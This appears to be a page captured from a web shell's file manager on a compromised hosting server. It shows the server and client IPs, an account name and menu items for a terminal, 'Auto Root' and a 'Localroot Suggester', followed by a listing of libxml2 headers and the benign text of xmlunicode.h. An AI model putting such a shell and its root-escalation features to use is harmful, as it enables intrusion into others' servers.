Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpanel /
ea-libxml2 /
include /
libxml2 /
libxml /
Delete
Unzip
Name
Size
Permission
Date
Action
HTMLparser.h
9.62
KB
-rw-r--r--
2025-08-05 23:23
HTMLtree.h
3.42
KB
-rw-r--r--
2025-08-05 23:23
SAX.h
4.31
KB
-rw-r--r--
2025-08-05 23:23
SAX2.h
4.33
KB
-rw-r--r--
2025-08-05 23:23
c14n.h
2.68
KB
-rw-r--r--
2025-08-05 23:23
catalog.h
4.51
KB
-rw-r--r--
2025-08-05 23:23
chvalid.h
4.97
KB
-rw-r--r--
2025-08-05 23:23
debugXML.h
4.82
KB
-rw-r--r--
2025-08-05 23:23
dict.h
1.73
KB
-rw-r--r--
2025-08-05 23:23
encoding.h
8.17
KB
-rw-r--r--
2025-08-05 23:23
entities.h
4.79
KB
-rw-r--r--
2025-08-05 23:23
globals.h
890
B
-rw-r--r--
2025-08-05 23:23
hash.h
6.85
KB
-rw-r--r--
2025-08-05 23:23
list.h
3.05
KB
-rw-r--r--
2025-08-05 23:23
nanoftp.h
3.92
KB
-rw-r--r--
2025-08-05 23:23
nanohttp.h
2.07
KB
-rw-r--r--
2025-08-05 23:23
parser.h
43.12
KB
-rw-r--r--
2025-08-05 23:23
parserInternals.h
16.42
KB
-rw-r--r--
2025-08-05 23:23
pattern.h
2.58
KB
-rw-r--r--
2025-08-05 23:23
relaxng.h
5.69
KB
-rw-r--r--
2025-08-05 23:23
schemasInternals.h
25.62
KB
-rw-r--r--
2025-08-05 23:23
schematron.h
4.16
KB
-rw-r--r--
2025-08-05 23:23
threads.h
1.69
KB
-rw-r--r--
2025-08-05 23:23
tree.h
37.96
KB
-rw-r--r--
2025-08-05 23:23
uri.h
2.79
KB
-rw-r--r--
2025-08-05 23:23
valid.h
12.99
KB
-rw-r--r--
2025-08-05 23:23
xinclude.h
3.04
KB
-rw-r--r--
2025-08-05 23:23
xlink.h
4.88
KB
-rw-r--r--
2025-08-05 23:23
xmlIO.h
12.16
KB
-rw-r--r--
2025-08-05 23:23
xmlautomata.h
3.7
KB
-rw-r--r--
2025-08-05 23:23
xmlerror.h
36.82
KB
-rw-r--r--
2025-08-05 23:23
xmlexports.h
3.2
KB
-rw-r--r--
2025-08-05 23:23
xmlmemory.h
4.79
KB
-rw-r--r--
2025-08-05 23:23
xmlmodule.h
1.11
KB
-rw-r--r--
2025-08-05 23:23
xmlreader.h
11.92
KB
-rw-r--r--
2025-08-05 23:23
xmlregexp.h
5.03
KB
-rw-r--r--
2025-08-05 23:23
xmlsave.h
2.51
KB
-rw-r--r--
2025-08-05 23:23
xmlschemas.h
6.74
KB
-rw-r--r--
2025-08-05 23:23
xmlschemastypes.h
4.48
KB
-rw-r--r--
2025-08-05 23:23
xmlstring.h
5.15
KB
-rw-r--r--
2025-08-05 23:23
xmlunicode.h
10.86
KB
-rw-r--r--
2025-08-05 23:23
xmlversion.h
5.27
KB
-rw-r--r--
2025-08-05 23:23
xmlwriter.h
20.2
KB
-rw-r--r--
2025-08-05 23:23
xpath.h
16.19
KB
-rw-r--r--
2025-08-05 23:23
xpathInternals.h
17.99
KB
-rw-r--r--
2025-08-05 23:23
xpointer.h
3.56
KB
-rw-r--r--
2025-08-05 23:23
Save
Rename
/* * Summary: Unicode character APIs * Description: API for the Unicode character APIs * * This file is automatically generated from the * UCS description files of the Unicode Character Database * http://www.unicode.org/Public/4.0-Update1/UCD-4.0.1.html * using the genUnicode.py Python script. * * Generation date: Tue Apr 30 17:30:38 2024 * Sources: Blocks-4.0.1.txt UnicodeData-4.0.1.txt * Author: Daniel Veillard */ #ifndef __XML_UNICODE_H__ #define __XML_UNICODE_H__ #include <libxml/xmlversion.h> #ifdef LIBXML_UNICODE_ENABLED #ifdef __cplusplus extern "C" { #endif XML_DEPRECATED XMLPUBFUN int xmlUCSIsAegeanNumbers (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsAlphabeticPresentationForms (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsArabic (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsArabicPresentationFormsA (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsArabicPresentationFormsB (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsArmenian (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsArrows (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsBasicLatin (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsBengali (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsBlockElements (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsBopomofo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsBopomofoExtended (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsBoxDrawing (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsBraillePatterns (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsBuhid (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsByzantineMusicalSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKCompatibility (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKCompatibilityForms (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKCompatibilityIdeographs (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKCompatibilityIdeographsSupplement (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKRadicalsSupplement (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKSymbolsandPunctuation (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKUnifiedIdeographs (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKUnifiedIdeographsExtensionA (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCJKUnifiedIdeographsExtensionB (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCherokee (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCombiningDiacriticalMarks (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCombiningDiacriticalMarksforSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCombiningHalfMarks (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCombiningMarksforSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsControlPictures (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCurrencySymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCypriotSyllabary (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCyrillic (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCyrillicSupplement (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsDeseret (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsDevanagari (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsDingbats (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsEnclosedAlphanumerics (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsEnclosedCJKLettersandMonths (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsEthiopic (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGeneralPunctuation (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGeometricShapes (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGeorgian (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGothic (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGreek (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGreekExtended (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGreekandCoptic (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGujarati (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsGurmukhi (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHalfwidthandFullwidthForms (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHangulCompatibilityJamo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHangulJamo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHangulSyllables (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHanunoo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHebrew (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHighPrivateUseSurrogates (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHighSurrogates (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsHiragana (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsIPAExtensions (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsIdeographicDescriptionCharacters (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsKanbun (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsKangxiRadicals (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsKannada (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsKatakana (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsKatakanaPhoneticExtensions (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsKhmer (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsKhmerSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLao (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLatin1Supplement (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLatinExtendedA (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLatinExtendedB (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLatinExtendedAdditional (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLetterlikeSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLimbu (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLinearBIdeograms (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLinearBSyllabary (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsLowSurrogates (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMalayalam (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMathematicalAlphanumericSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMathematicalOperators (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMiscellaneousMathematicalSymbolsA (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMiscellaneousMathematicalSymbolsB (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMiscellaneousSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMiscellaneousSymbolsandArrows (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMiscellaneousTechnical (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMongolian (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMusicalSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsMyanmar (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsNumberForms (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsOgham (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsOldItalic (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsOpticalCharacterRecognition (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsOriya (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsOsmanya (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsPhoneticExtensions (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsPrivateUse (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsPrivateUseArea (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsRunic (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsShavian (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSinhala (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSmallFormVariants (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSpacingModifierLetters (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSpecials (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSuperscriptsandSubscripts (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSupplementalArrowsA (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSupplementalArrowsB (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSupplementalMathematicalOperators (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSupplementaryPrivateUseAreaA (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSupplementaryPrivateUseAreaB (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsSyriac (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsTagalog (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsTagbanwa (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsTags (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsTaiLe (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsTaiXuanJingSymbols (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsTamil (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsTelugu (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsThaana (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsThai (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsTibetan (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsUgaritic (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsUnifiedCanadianAboriginalSyllabics (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsVariationSelectors (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsVariationSelectorsSupplement (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsYiRadicals (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsYiSyllables (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsYijingHexagramSymbols (int code); XMLPUBFUN int xmlUCSIsBlock (int code, const char *block); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatC (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatCc (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatCf (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatCo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatCs (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatL (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatLl (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatLm (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatLo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatLt (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatLu (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatM (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatMc (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatMe (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatMn (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatN (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatNd (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatNl (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatNo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatP (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatPc (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatPd (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatPe (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatPf (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatPi (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatPo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatPs (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatS (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatSc (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatSk (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatSm (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatSo (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatZ (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatZl (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatZp (int code); XML_DEPRECATED XMLPUBFUN int xmlUCSIsCatZs (int code); XMLPUBFUN int xmlUCSIsCat (int code, const char *cat); #ifdef __cplusplus } #endif #endif /* LIBXML_UNICODE_ENABLED */ #endif /* __XML_UNICODE_H__ */